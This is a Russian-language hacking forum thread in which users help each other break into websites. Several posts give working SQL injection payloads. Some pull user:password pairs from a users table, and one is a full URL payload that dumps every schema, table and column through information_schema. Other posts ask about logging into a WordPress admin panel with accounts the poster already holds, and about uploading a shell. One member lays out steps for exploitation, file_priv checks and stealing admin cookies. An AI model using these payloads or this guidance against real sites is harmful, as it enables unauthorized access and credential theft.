Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Можно. Нужно изучить материал по error и time based инъекциям.
     
    Gorev and garrik like this.
  2. garrik

    garrik New Member

    Joined:
    1 Jul 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Спасибо, нужно серьезно зарываться в эту тему, за денек такое не осилишь.
    Еще вопрос: при такой уязвимости: SELECT subject, message WHERE ID=1'+инъекция, создается таблица с двумя строками, первая строка - данные "subject, message", вторая - данные, полученные с помощью оператора UNION инъекции. Проблема в том, что выводится в браузере только первая строка. Можно ли как-то вывести данные со второй строки ? Может есть возможность как-то соединить две строки в одну в одном запросе ? При ID=-1 ничего не выводит :(
     
  3. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Пост не осилил. Исходя из того, что удалось понять, стоит смотреть в сторону мануалов и изучения синтаксиса запросов. К примеру, в MySQL строки можно объеденить используя CONCAT.
     
  4. garrik

    garrik New Member

    Joined:
    1 Jul 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Может неправильно выразился, примерный код вместе с инъекцией: SELECT subject, message FROM messages WHERE id=1 UNION SELECT user, password FROM users WHERE id=1
    формирует таблицу с двумя строками, в браузере выводится только первая, а мне нужна вторая (с паролем). О CONCAT думал, сейчас читаю о ней.....
     
  5. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    SELECT subject, message FROM messages WHERE id=1 UNION SELECT concat(user,':',password),2 FROM users WHERE id=1
     
  6. dooble

    dooble Members of Antichat

    Joined:
    30 Dec 2016
    Messages:
    231
    Likes Received:
    601
    Reputations:
    145
    Нужная строки выбирается limit n-1,1.

    SELECT subject, message FROM messages WHERE id=1 UNION SELECT user, password FROM users WHERE id=1 limit 1,1
     
    #2126 dooble, 6 Nov 2017
    Last edited: 6 Nov 2017
    garrik likes this.
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    мб кто вкурсе, можно ли в wordpress авторизоваться в админку не через wp-login.php? на нее штака стоит. На /wp-admin/ пускает но редиректит, куки админа не перехватить, но админские аккаунты имеются, какие есть варианты?
     
  8. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Действительно ли это админка? Подходит ли пароль к мылу, к фтп, и прочим сервисам?
     
  9. Mobilesouyhj

    Mobilesouyhj Banned

    Joined:
    3 Sep 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    С чего вы взяли что это скуля?

    Warning: realpath(): open_basedir restriction in effect. File(/usr/share/php) is not within the allowed path(s): (/var/www/civil/data:.) in /var/www/civil/data/www/_symfony-1.4.19/lib/util/sfToolkit.class.php on line 592
    В самой ошибке ответ на все.
     
  11. Mobilesouyhj

    Mobilesouyhj Banned

    Joined:
    3 Sep 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Т.е. залится не получится?
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Такое ощущение что вы где то услышали термины: скуля,админка,залится и используете их не понимая смысла.
    1.определить если есть ошибка
    2.определить вектор атаки
    3. Эксплуатируй уязвимость
    4.используйте полученную информацию для получения доступа

    В твоём случае к чему вопрос о заливке если даже намека на уязвимость нет,не считая раскрытие путей,найди инъекцию,посмотри на права юзера,если file_priv=on,тогда задавай вопрос о заливке,или же получи данные от панели управления и тогда задавай вопрос о заливке,или вылови куки админа,и тогда задавай вопрос о заливке. Можно продолжать долго...
     
    TimeToPlayTheGame and Veil like this.
  13. Mobilesouyhj

    Mobilesouyhj Banned

    Joined:
    3 Sep 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Да там нет уязвимостей я уже протестил, за то сайт весь на ошибках )) кстати : on /phpinfo.php
     
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Что-on? Если про file_priv,то мне кажется вы что то путаете.
     
  15. Mobilesouyhj

    Mobilesouyhj Banned

    Joined:
    3 Sep 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Там не одной скули нет
     
  16. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Вопрос такой.
    Есть иньекция на сайте. Таблицы выдергиваются из базы "А".
    На сервере под одним пользователем крутиться 3 базы: А. Б.С.
    Как составить запрос, чтобы можно выдернуть таблицы, колонки из базы Б и С?
    Так берутся данные из базы А.
    sqlmap не советуйте, сервер настроен так, что надо ручками.

    Когда я написал этот пост я не остановился. Я стал искать дальше и выяснил, что это можно сделать следующим запросом:
    group_concat(table_name+SEPARATOR+0x0b) - выводит список таблиц
    FROM%20information_schema.tables%20WHERE%20table_schema=0x6372%20-- - откуда брать таблицы.

    ЗаHEXованная строчка - это название базы данных.

    ну и колонки это:
     
    #2136 Muracha, 11 Nov 2017
    Last edited: 11 Nov 2017
  17. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
  18. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    http://site/shop.php?id=-260+union+select+1,2,3,4,5,(select(@n)from(select(@n:=0x20),(select(null)from(information_schema.columns)where(0x2b)in(@n:=concat(@n,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))and(table_schema!=0x696e666f726d6174696f6e5f736368656d61)))n),7,8,9,10,11,12,13,14-- -
    Для ознакомления прочтите
     
  19. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    level и risk выставлял ?
     
  20. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Причем тут лвл и риск ? Говорит же что sqlmap не катит